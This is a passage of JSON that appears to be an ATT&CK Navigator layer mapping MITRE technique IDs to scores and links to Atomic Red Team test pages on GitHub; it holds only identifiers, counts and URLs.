Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":69,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1542","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1542/T1542.md"}]},{"techniqueID":"T1542.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1542.001/T1542.001.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View 